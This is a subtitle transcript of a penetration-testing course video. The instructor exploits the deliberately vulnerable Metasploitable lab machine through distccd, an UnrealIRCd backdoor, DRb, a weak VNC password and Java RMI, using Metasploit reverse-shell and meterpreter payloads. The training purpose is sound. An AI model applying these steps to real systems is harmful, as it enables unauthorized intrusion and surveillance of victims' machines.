1 00:00:00,660 --> 00:00:03,638 -: Okay, it is time for a small challenge. 2 00:00:03,638 --> 00:00:05,340 We can say we are getting more 3 00:00:05,340 --> 00:00:09,600 and more familiar with MSF Console and Exploitation and 4 00:00:09,600 --> 00:00:12,600 by now you should be familiar with the entire process 5 00:00:12,600 --> 00:00:16,239 of searching for a vulnerability and trying to exploit it. 6 00:00:16,239 --> 00:00:19,008 Let's put all of that to the test. 7 00:00:19,008 --> 00:00:23,220 So for now, we covered about four to five vulnerabilities 8 00:00:23,220 --> 00:00:25,383 on the Meta Exploitable virtual machine. 9 00:00:26,340 --> 00:00:27,840 And what they want you to do 10 00:00:27,840 --> 00:00:31,800 in this video is find three different vulnerabilities 11 00:00:31,800 --> 00:00:35,426 that will give you a shell back on the target machine. 12 00:00:35,426 --> 00:00:39,510 You can use any tools that you want besides searching 13 00:00:39,510 --> 00:00:42,090 for links that will give you the exact steps 14 00:00:42,090 --> 00:00:43,690 to exploiting the vulnerability. 15 00:00:44,883 --> 00:00:46,631 And feel free to use Google 16 00:00:46,631 --> 00:00:48,090 if you want to to see if a software is vulnerable. 17 00:00:48,090 --> 00:00:49,990 You can also use Search Exploit to see 18 00:00:51,175 --> 00:00:52,433 whether you have exploit in your database. 19 00:00:53,299 --> 00:00:54,150 You can use Nmap to scan 20 00:00:54,150 --> 00:00:56,253 and metasploit framework to exploit. 21 00:00:57,180 --> 00:00:59,970 After we do this challenge, we are ready to move 22 00:00:59,970 --> 00:01:02,910 on to some harder Windows exploits. 23 00:01:02,910 --> 00:01:06,690 And after that we're going to see how to exploit the target 24 00:01:06,690 --> 00:01:09,150 without using MSF console and 25 00:01:09,150 --> 00:01:11,340 without having an exploit available 26 00:01:11,340 --> 00:01:13,563 inside of our Calix machine. 27 00:01:14,430 --> 00:01:15,263 Okay, great. 28 00:01:16,393 --> 00:01:17,790 So pause this video right now. 29 00:01:17,790 --> 00:01:19,530 Give yourself 10 to 20 minutes 30 00:01:19,530 --> 00:01:22,560 and try to find three different vulnerabilities 31 00:01:22,560 --> 00:01:26,070 on the Meta Exploitable that will give you a shell back. 32 00:01:26,070 --> 00:01:28,020 I myself will do it right now. 33 00:01:28,020 --> 00:01:30,055 So if you don't want me to spoil it for you 34 00:01:30,055 --> 00:01:34,080 then try to find them first and then watch this video. 35 00:01:34,080 --> 00:01:36,540 The harder part is to find them, however 36 00:01:36,540 --> 00:01:39,570 once you find them it is easy to exploit them. 37 00:01:39,570 --> 00:01:41,193 Let's get straight into it. 38 00:01:42,300 --> 00:01:44,130 Let's start by scanning the target 39 00:01:44,130 --> 00:01:46,980 for all the open ports and its services. 40 00:01:46,980 --> 00:01:49,260 So what I'm going to do is I will perform the usual 41 00:01:49,260 --> 00:01:52,230 Nmap version scan on my Meta Exploitable 42 00:01:52,230 --> 00:01:57,230 and WS dash P dash which stands for scan all 65,000 ports. 43 00:01:58,470 --> 00:02:00,963 If I press here enter, enter my password. 44 00:02:00,963 --> 00:02:04,560 And by the way, of course the vulnerabilities 45 00:02:04,560 --> 00:02:07,290 that we covered don't count at the moment. 46 00:02:07,290 --> 00:02:10,169 We will not pay attention to them at all right now. 47 00:02:10,169 --> 00:02:13,230 We want to find new vulnerabilities. 48 00:02:13,230 --> 00:02:15,780 So while this scan is working, I will go 49 00:02:15,780 --> 00:02:20,497 to a second terminal and I will start the MSF console 50 00:02:20,497 --> 00:02:23,730 and I will also open a third terminal 51 00:02:23,730 --> 00:02:25,950 in case we need something like a search exploit 52 00:02:25,950 --> 00:02:28,710 or some other tool to run right here. 53 00:02:28,710 --> 00:02:31,980 So the goal is to find three vulnerabilities. 54 00:02:31,980 --> 00:02:34,170 Let's see after our scan finishes 55 00:02:34,170 --> 00:02:35,470 whether we manage to do so 56 00:02:36,960 --> 00:02:38,670 and here are the results of the scan. 57 00:02:38,670 --> 00:02:41,249 So we got bunch reports open as usual 58 00:02:41,249 --> 00:02:43,626 and let's go and pick any one of them. 59 00:02:43,626 --> 00:02:46,470 For example, I know for a fact 60 00:02:46,470 --> 00:02:51,470 that this this C open port which is 3632 is vulnerable. 61 00:02:52,800 --> 00:02:55,500 It is running this C version one. 62 00:02:55,500 --> 00:02:58,770 And if I go to my meta split framework 63 00:02:58,770 --> 00:03:01,770 and I just type search this c 64 00:03:01,770 --> 00:03:05,070 I will only get one exploit available. 65 00:03:05,070 --> 00:03:09,240 This C execute or Daemon command execution. 66 00:03:09,240 --> 00:03:10,950 It is ranked excellent. 67 00:03:10,950 --> 00:03:12,690 So since this is the only exploit 68 00:03:12,690 --> 00:03:17,587 let's give it a try, I will copy it, I will type use 69 00:03:17,587 --> 00:03:22,358 and then paste the exploit name, clear the screen. 70 00:03:22,358 --> 00:03:25,380 We can show info just to know what this exploit does. 71 00:03:25,380 --> 00:03:28,050 And it says that this module uses a documented 72 00:03:28,050 --> 00:03:31,170 security weakness to execute arbitrary commands 73 00:03:31,170 --> 00:03:35,670 on any system running this c cd. 74 00:03:35,670 --> 00:03:40,670 And our system is indeed running this ccd. 75 00:03:40,680 --> 00:03:43,504 So what we are going to do is we are going to 76 00:03:43,504 --> 00:03:47,340 type show options and set the R host to be the IP address 77 00:03:47,340 --> 00:03:49,340 of our Meta Exploitable. 78 00:03:49,340 --> 00:03:51,571 Let's see, show payloads. 79 00:03:51,571 --> 00:03:54,390 So we got quite a few payloads right here. 80 00:03:54,390 --> 00:03:55,980 Let us use this one. 81 00:03:55,980 --> 00:03:57,960 Cmd Unix reverse. 82 00:03:57,960 --> 00:04:00,600 So this is reverse DCP or telnet. 83 00:04:00,600 --> 00:04:02,610 Let's set it right here. 84 00:04:02,610 --> 00:04:04,890 Since at the moment if I show options, 85 00:04:04,890 --> 00:04:06,780 we don't have any payload set up. 86 00:04:06,780 --> 00:04:11,250 Let's set payload, cmd, unix 87 00:04:11,250 --> 00:04:15,300 and then reverse, show options once again. 88 00:04:15,300 --> 00:04:16,980 Now we need to set the L host. 89 00:04:16,980 --> 00:04:21,130 So I will type sudo if config enter my password, 90 00:04:21,130 --> 00:04:24,880 my IP address is 192.168.1.8 91 00:04:25,770 --> 00:04:28,320 Let's copy it and let's set 92 00:04:28,320 --> 00:04:31,953 our host to be equal to that IP address. 93 00:04:33,210 --> 00:04:36,480 Now if we triple check all of our available options, 94 00:04:36,480 --> 00:04:38,040 we should be good to go. 95 00:04:38,040 --> 00:04:43,040 Let us run our exploit, and here it is. 96 00:04:45,122 --> 00:04:46,050 First one is over. 97 00:04:46,050 --> 00:04:48,720 We got the command shell session one opened 98 00:04:48,720 --> 00:04:50,250 on the target machine. 99 00:04:50,250 --> 00:04:51,690 If I type who am I? 100 00:04:51,690 --> 00:04:56,490 We're Damon, If I type LS or print working directory 101 00:04:56,490 --> 00:04:59,070 we are in the slash TMP directory. 102 00:04:59,070 --> 00:05:02,130 Host name command will tell us that we are metasploitable 103 00:05:02,130 --> 00:05:05,010 and your name dash A will tell us 104 00:05:05,010 --> 00:05:08,103 that we're Linux metasploitable 2.6 point 24. 105 00:05:09,437 --> 00:05:12,360 And here we also get some other information such as date 106 00:05:12,360 --> 00:05:15,030 and which version of Linux it is. 107 00:05:15,030 --> 00:05:17,850 Great. So first one is done. 108 00:05:17,850 --> 00:05:22,850 Let us control C this, abort session one, select yes 109 00:05:23,100 --> 00:05:26,553 and let's go back to our scan to find another vulnerability. 110 00:05:27,750 --> 00:05:31,860 So if you remember during our scans, once you 111 00:05:31,860 --> 00:05:34,320 perform the vulnerability scan, we noticed 112 00:05:34,320 --> 00:05:38,160 that this Unreal IRC was vulnerable. 113 00:05:38,160 --> 00:05:41,250 We got from some of our scans result that this 114 00:05:41,250 --> 00:05:45,030 specific service is vulnerable to some type of the attack. 115 00:05:45,030 --> 00:05:46,770 So let's give it a try. 116 00:05:46,770 --> 00:05:51,370 Let's go to our search exploit and type searchsploit irc. 117 00:05:53,880 --> 00:05:57,690 And this gives us a bunch of different information. 118 00:05:57,690 --> 00:06:00,749 So this isn't really useful for us. 119 00:06:00,749 --> 00:06:02,370 Let's try it like this. 120 00:06:02,370 --> 00:06:06,150 Let's go to our scan and copy Unreal RCD 121 00:06:06,150 --> 00:06:07,830 which is the version. 122 00:06:07,830 --> 00:06:10,980 And now if I type searchsploit and the name 123 00:06:10,980 --> 00:06:15,980 of the version, well we narrow it down to four results 124 00:06:16,260 --> 00:06:19,620 and one of them doesn't count since it is remote denial 125 00:06:19,620 --> 00:06:21,270 of service. 126 00:06:21,270 --> 00:06:24,090 Out of all of this we got one Ruby Exploit 127 00:06:24,090 --> 00:06:26,700 which means it belongs to Metasploit framework. 128 00:06:26,700 --> 00:06:30,930 It is for version 3.2.8 and it is backdoor command 129 00:06:30,930 --> 00:06:35,340 execution. Let's search it inside of our Metasploit 130 00:06:35,340 --> 00:06:39,273 framework. So search and then Unreal rc. 131 00:06:40,230 --> 00:06:43,353 And we do get indeed only one exploit for this. 132 00:06:44,265 --> 00:06:47,220 It is ranked excellent and it is from 2010. 133 00:06:47,220 --> 00:06:48,053 Let's copy it 134 00:06:49,890 --> 00:06:50,723 right here. 135 00:06:50,723 --> 00:06:54,940 Copy selection and as usual, use this exploit 136 00:06:56,051 --> 00:06:58,710 Show info will tell us 137 00:06:58,710 --> 00:07:01,800 that this module exploits a malicious backdoor 138 00:07:01,800 --> 00:07:06,800 that was added to the Unreal RCD 3.2.8 download archive. 139 00:07:07,740 --> 00:07:08,670 So as it says 140 00:07:08,670 --> 00:07:11,310 this module will exploit some malicious backdoor 141 00:07:11,310 --> 00:07:13,920 that was added in this specific version. 142 00:07:13,920 --> 00:07:18,690 And if we show options, we need to set the R hosts as 143 00:07:18,690 --> 00:07:23,430 in the previous exploit and we also need to set the payload. 144 00:07:23,430 --> 00:07:24,390 But before we set it 145 00:07:24,390 --> 00:07:27,247 let's show our available payloads first. 146 00:07:27,247 --> 00:07:28,680 Show payloads 147 00:07:28,680 --> 00:07:30,250 pardon may not show options 148 00:07:31,155 --> 00:07:33,332 and we get the same result as previously. 149 00:07:33,332 --> 00:07:36,310 So we are just going to go with the reverse DCP over Telnet 150 00:07:38,142 --> 00:07:43,142 and if I type set payload and then paste the payload name. 151 00:07:43,920 --> 00:07:46,560 Now we need to set the L host to be the IP address 152 00:07:46,560 --> 00:07:48,063 of our Cal Linux machine. 153 00:07:49,557 --> 00:07:51,720 And if we triple check our options, everything is set 154 00:07:51,720 --> 00:07:56,720 type run and here it is, command shell session two open. 155 00:07:59,962 --> 00:08:04,380 We got the second exploit down, let's check out if it works. 156 00:08:04,380 --> 00:08:05,955 Who am I? 157 00:08:05,955 --> 00:08:07,170 We are the root account. 158 00:08:07,170 --> 00:08:09,630 Host name will tell us we are Metasploitable. 159 00:08:09,630 --> 00:08:12,030 So this is the second one down. 160 00:08:12,030 --> 00:08:14,730 We got one more left to go. 161 00:08:14,730 --> 00:08:16,083 Let's control c this. 162 00:08:17,970 --> 00:08:20,160 Go back to our scan. 163 00:08:20,160 --> 00:08:22,260 And we are doing this really fast tempo 164 00:08:22,260 --> 00:08:24,840 because we already are familiar with all 165 00:08:24,840 --> 00:08:26,970 of these tools and techniques that we use 166 00:08:26,970 --> 00:08:29,343 to exploit these vulnerable softwares. 167 00:08:30,300 --> 00:08:32,789 If you didn't manage to find three different exploits, 168 00:08:32,789 --> 00:08:33,623 don't worry. 169 00:08:33,623 --> 00:08:35,370 This comes with the practice. 170 00:08:35,370 --> 00:08:38,250 So after some time practicing you'll be able to 171 00:08:38,250 --> 00:08:41,490 find even more than three exploits. 172 00:08:41,490 --> 00:08:44,070 Let's continue on the third one. 173 00:08:44,070 --> 00:08:45,840 So if we go down here and check 174 00:08:45,840 --> 00:08:50,010 out what different services we got running this one 175 00:08:50,010 --> 00:08:54,780 which is running over port 8787 running service drb. 176 00:08:54,780 --> 00:08:57,565 I know for a fact that it is vulnerable, 177 00:08:57,565 --> 00:08:59,605 so let's give it a try. 178 00:08:59,605 --> 00:09:02,310 The service name is drb. 179 00:09:02,310 --> 00:09:06,123 So if I type in my searchsploit drb. 180 00:09:07,290 --> 00:09:09,971 Well we only get a few results right here 181 00:09:09,971 --> 00:09:12,570 and it doesn't seem that any one 182 00:09:12,570 --> 00:09:15,090 of them belongs to the Metasploit framework. 183 00:09:15,090 --> 00:09:18,510 As we can see right here, since these are Python files. 184 00:09:18,510 --> 00:09:20,520 So let's just double check. 185 00:09:20,520 --> 00:09:22,200 Whoops, not here. 186 00:09:22,200 --> 00:09:23,760 Let's just double check right here 187 00:09:23,760 --> 00:09:26,700 if we can find something regarding DRP 188 00:09:26,700 --> 00:09:29,011 and we do manage to find it. 189 00:09:29,011 --> 00:09:32,790 So we got these two exploits which are 190 00:09:32,790 --> 00:09:37,790 for the multi and we got this DRB remote code execution 191 00:09:38,206 --> 00:09:42,030 and it says distributed Ruby remote code execution. 192 00:09:42,030 --> 00:09:44,100 And if I go right here under diversion 193 00:09:44,100 --> 00:09:47,010 we can see that it is running Ruby. 194 00:09:47,010 --> 00:09:48,870 So let's just give it a try. 195 00:09:48,870 --> 00:09:50,430 You never know if we copy 196 00:09:50,430 --> 00:09:54,750 this exploit which says drb remote code execution. 197 00:09:54,750 --> 00:09:56,313 And we use it right here; 198 00:09:58,867 --> 00:10:01,257 Show our options. 199 00:10:01,257 --> 00:10:05,310 We can see by default it has set the payload to be cmd Unix 200 00:10:05,310 --> 00:10:10,310 reverse netcat and we got two different things to set up. 201 00:10:10,890 --> 00:10:13,170 Matter of fact, one of them is uri 202 00:10:13,170 --> 00:10:15,244 which is not really needed. 203 00:10:15,244 --> 00:10:16,644 So we can only set our hosts 204 00:10:17,490 --> 00:10:20,100 and for some reason it does say that our host 205 00:10:20,100 --> 00:10:20,940 is not required 206 00:10:20,940 --> 00:10:22,980 but I'm not really sure how it is not required. 207 00:10:22,980 --> 00:10:25,530 So we will just specify it anyway. 208 00:10:25,530 --> 00:10:29,787 Set our hosts 192.168.1.7 209 00:10:31,123 --> 00:10:33,960 Since the payload is already been set 210 00:10:33,960 --> 00:10:38,960 let us just run the exploit and here it is. 211 00:10:39,510 --> 00:10:42,693 We got command shell session three open. 212 00:10:44,280 --> 00:10:46,440 Let's type who am I? 213 00:10:46,440 --> 00:10:48,215 We are root account. 214 00:10:48,215 --> 00:10:49,396 And once again 215 00:10:49,396 --> 00:10:52,740 host name will tell us we're Metasploitable machine. 216 00:10:52,740 --> 00:10:56,340 And with this we completed our challenge. 217 00:10:56,340 --> 00:10:58,800 We found three different vulnerabilities 218 00:10:58,800 --> 00:11:02,580 that gave us a shell back, but these are not the only ones. 219 00:11:02,580 --> 00:11:05,190 So matter of fact, let me just show you one or two more 220 00:11:05,190 --> 00:11:08,711 that you could have found if you performed this challenge. 221 00:11:08,711 --> 00:11:11,790 The one that is a little bit different to 222 00:11:11,790 --> 00:11:16,290 exploit is this VNC service running on port 5900. 223 00:11:17,760 --> 00:11:19,550 It is running Protocol 3.3. 224 00:11:20,400 --> 00:11:21,660 And if we just search 225 00:11:21,660 --> 00:11:26,660 in the searchsploit search bnc, oops, search exploit vnc 226 00:11:27,930 --> 00:11:30,300 we will get bunch of the results right here. 227 00:11:30,300 --> 00:11:33,210 So let's add the version 3.3 228 00:11:33,210 --> 00:11:35,880 and we do get some of the responses right here 229 00:11:35,880 --> 00:11:38,896 but it does say that these are for Windows. 230 00:11:38,896 --> 00:11:41,940 Now we are not going to give up just 231 00:11:41,940 --> 00:11:45,757 because we cannot find the exploit using searchsploit. 232 00:11:45,757 --> 00:11:49,230 Matter of fact it probably is somewhere right here 233 00:11:49,230 --> 00:11:52,050 just there is a bunch of result and we don't really want 234 00:11:52,050 --> 00:11:55,230 to read through all this to find the exploit that we need. 235 00:11:55,230 --> 00:11:57,690 So let's just go straight to the metasploit and 236 00:11:57,690 --> 00:11:59,850 type search vnc. 237 00:11:59,850 --> 00:12:01,350 And if I scroll all the way up 238 00:12:01,350 --> 00:12:06,150 since these are just payloads I come to exploits. 239 00:12:06,150 --> 00:12:08,077 We can see there about five 240 00:12:08,077 --> 00:12:12,210 or six exploits and these four are for Windows. 241 00:12:12,210 --> 00:12:14,753 So we can forget about them straight away. 242 00:12:14,753 --> 00:12:18,857 We got this one and we got this one. 243 00:12:18,857 --> 00:12:21,780 This one seems interesting. 244 00:12:21,780 --> 00:12:22,613 It is an exploit 245 00:12:22,613 --> 00:12:25,380 for multiple operating systems for vnc, 246 00:12:25,380 --> 00:12:28,255 And it says vnc keyboard execution. 247 00:12:28,255 --> 00:12:32,550 So let's just copy the name and see whether it works. 248 00:12:32,550 --> 00:12:35,430 Now this is just a part of penetration test. 249 00:12:35,430 --> 00:12:37,860 If you don't know an exact exploit, you simply 250 00:12:37,860 --> 00:12:41,220 just try a few different ones and see if they work. 251 00:12:41,220 --> 00:12:42,420 Just get used to it 252 00:12:42,420 --> 00:12:45,030 that some exploits will sometimes not work 253 00:12:45,030 --> 00:12:48,270 and you will have no idea why they don't work. 254 00:12:48,270 --> 00:12:52,950 So let's just type set, or pardon me, let's just type use. 255 00:12:52,950 --> 00:12:54,303 And then the exploit name. 256 00:12:55,860 --> 00:12:59,670 And this seems that it isn't an exploit for us 257 00:12:59,670 --> 00:13:03,630 since it is also setting the windows payload. 258 00:13:03,630 --> 00:13:06,840 Hmm, we cannot find a VNC exploit. 259 00:13:06,840 --> 00:13:08,940 So what are we going to do? 260 00:13:08,940 --> 00:13:12,450 Well if I go right here and instead of searching 261 00:13:12,450 --> 00:13:15,850 for an exploit, I simply just try to connect to D V and C 262 00:13:17,191 --> 00:13:18,960 using a tool called vncviewer 263 00:13:18,960 --> 00:13:21,510 And all I need to specify to connect to is the 264 00:13:21,510 --> 00:13:24,423 IP address to that target machine. 265 00:13:25,492 --> 00:13:27,000 Press enter. 266 00:13:27,000 --> 00:13:30,510 Hmm, it seems to be asking for a password. 267 00:13:30,510 --> 00:13:32,820 Well let's try MSF admin 268 00:13:32,820 --> 00:13:35,651 which is the usual password for everything 269 00:13:35,651 --> 00:13:39,690 in Metasploitable and it tells us authentication failure. 270 00:13:39,690 --> 00:13:42,327 But if we try it once again and as a password 271 00:13:42,327 --> 00:13:45,172 I simply just type password. 272 00:13:45,172 --> 00:13:48,360 Well it worked. 273 00:13:48,360 --> 00:13:52,530 The vnc viewer password was just password 274 00:13:52,530 --> 00:13:56,610 and now I got root shell open on DME exploitable 275 00:13:56,610 --> 00:13:59,109 I can execute commands right here such 276 00:13:59,109 --> 00:14:01,950 as iconfig such as host name LS 277 00:14:01,950 --> 00:14:05,490 and I can see anything that is on the target machine. 278 00:14:05,490 --> 00:14:07,710 So this exploit was a little bit different because 279 00:14:07,710 --> 00:14:09,750 it was due to a weak password. 280 00:14:09,750 --> 00:14:13,710 I just connected to D V and C and I typed password 281 00:14:13,710 --> 00:14:16,590 and it granted the access to the road shell 282 00:14:16,590 --> 00:14:18,210 of the Metasploitable. 283 00:14:18,210 --> 00:14:22,290 Great, to exit this I can type exit and I can 284 00:14:22,290 --> 00:14:24,840 exit this desktop right here. 285 00:14:24,840 --> 00:14:26,940 And let me show you just one more and then we 286 00:14:26,940 --> 00:14:31,867 are going to end the video and that one is over port 1099 287 00:14:33,561 --> 00:14:36,510 It is running Java rmi. 288 00:14:36,510 --> 00:14:39,750 And if I go in my Metasploit framework and 289 00:14:39,750 --> 00:14:43,087 search for Java underscore rmi, 290 00:14:43,087 --> 00:14:47,929 well we get two exploits right here. 291 00:14:47,929 --> 00:14:50,490 Let's try with this one first. 292 00:14:50,490 --> 00:14:53,910 So exploit multi misc java rmi server. 293 00:14:53,910 --> 00:14:55,180 copy the exploit name 294 00:14:56,040 --> 00:14:57,670 go right here and type use 295 00:14:59,490 --> 00:15:01,680 it will set the default payload to 296 00:15:01,680 --> 00:15:05,670 be Java meterpreter reverse tcp. 297 00:15:05,670 --> 00:15:08,368 Now this is the first time that we are 298 00:15:08,368 --> 00:15:10,170 encountering a meterpreter payload. 299 00:15:10,170 --> 00:15:12,360 You will see that it is a little bit different 300 00:15:12,360 --> 00:15:14,280 than all the other shells that we got 301 00:15:14,280 --> 00:15:16,590 in the previous exploits. 302 00:15:16,590 --> 00:15:18,846 So if you type show options 303 00:15:18,846 --> 00:15:22,290 there are a bunch of things that I need to set. 304 00:15:22,290 --> 00:15:26,190 Our payload options has already been set to correct one, 305 00:15:26,190 --> 00:15:29,400 to the correct IP address and to the correct port. 306 00:15:29,400 --> 00:15:32,366 All we need to set right here is the r hosts. 307 00:15:32,366 --> 00:15:34,740 You can just leave the server host 308 00:15:34,740 --> 00:15:39,106 in server port to be 0.0.0.0 and 8080. 309 00:15:39,106 --> 00:15:40,590 If I go right here 310 00:15:40,590 --> 00:15:44,702 and type set r hosts 192.168.1.7 311 00:15:44,702 --> 00:15:49,702 and I run this, well, here it is, 312 00:15:50,907 --> 00:15:54,798 we got the meterpreter session for open. 313 00:15:54,798 --> 00:15:57,101 And if you want to execute the commands 314 00:15:57,101 --> 00:15:59,790 you can just wait for this exploit to finish. 315 00:15:59,790 --> 00:16:02,040 And even though it says right here, exploit failed 316 00:16:02,040 --> 00:16:07,040 if I type sessions, I will have the meterpreter session four 317 00:16:07,290 --> 00:16:08,880 and I can enter that session 318 00:16:08,880 --> 00:16:11,190 by typing sessions and then dash I 319 00:16:11,190 --> 00:16:14,553 and then the ID of that session, which in my case is four. 320 00:16:15,780 --> 00:16:18,423 And I've entered the meterpreter shell. 321 00:16:19,440 --> 00:16:21,960 Right here the commands are different. 322 00:16:21,960 --> 00:16:23,868 To check out all 323 00:16:23,868 --> 00:16:25,650 of the commands that we can run with the meterpreter 324 00:16:26,747 --> 00:16:27,580 we can type the help command. 325 00:16:28,506 --> 00:16:30,450 And you can see it is split into different sections such 326 00:16:30,450 --> 00:16:33,960 as file system commands such as core commands. 327 00:16:33,960 --> 00:16:37,800 And all of these commands work with meterpreter shell. 328 00:16:37,800 --> 00:16:41,794 We can download and upload files, we can execute a command 329 00:16:41,794 --> 00:16:45,990 we can screenshare, we can perform a screenshot 330 00:16:45,990 --> 00:16:48,812 of the target machine, we can record the microphone 331 00:16:48,812 --> 00:16:52,434 and many other things that we're going to check out later. 332 00:16:52,434 --> 00:16:56,312 But for now we can use a command called Shell to 333 00:16:56,312 --> 00:17:00,330 enter the command shell with the target machine. 334 00:17:00,330 --> 00:17:02,191 So if you type, who am I? 335 00:17:02,191 --> 00:17:03,748 Once again, 336 00:17:03,748 --> 00:17:04,770 right now I am a root account 337 00:17:04,770 --> 00:17:07,530 with the IP address of the meta exploitable. 338 00:17:07,530 --> 00:17:10,680 Great. Now I left this meterpreter shell 339 00:17:10,680 --> 00:17:13,762 for the end just so we can slowly start getting 340 00:17:13,762 --> 00:17:17,520 into using meterpreter shell on our target machine. 341 00:17:17,520 --> 00:17:18,720 As we can see there is a lot 342 00:17:18,720 --> 00:17:21,089 of the commands that we can run. 343 00:17:21,089 --> 00:17:24,030 Now in the next video we're going to start 344 00:17:24,030 --> 00:17:27,630 with Windows exploitation and in Windows exploitation 345 00:17:27,630 --> 00:17:29,730 we are most likely always going to want to 346 00:17:29,730 --> 00:17:31,413 open a meterpreter shell. 347 00:17:32,430 --> 00:17:34,410 So that would be about it for this challenge. 348 00:17:34,410 --> 00:17:35,243 Once again 349 00:17:35,243 --> 00:17:37,643 if you manage to find three different vulnerabilities, 350 00:17:38,926 --> 00:17:40,286 congratulations. 351 00:17:40,286 --> 00:17:42,300 If not, don't worry. This comes with practice. 352 00:17:42,300 --> 00:17:44,700 Now that we covered meta exploitable vulnerabilities 353 00:17:44,700 --> 00:17:46,740 which were rather easy 354 00:17:46,740 --> 00:17:50,400 it is time to move on to the windows vulnerabilities. 355 00:17:50,400 --> 00:17:51,700 See you in the next video.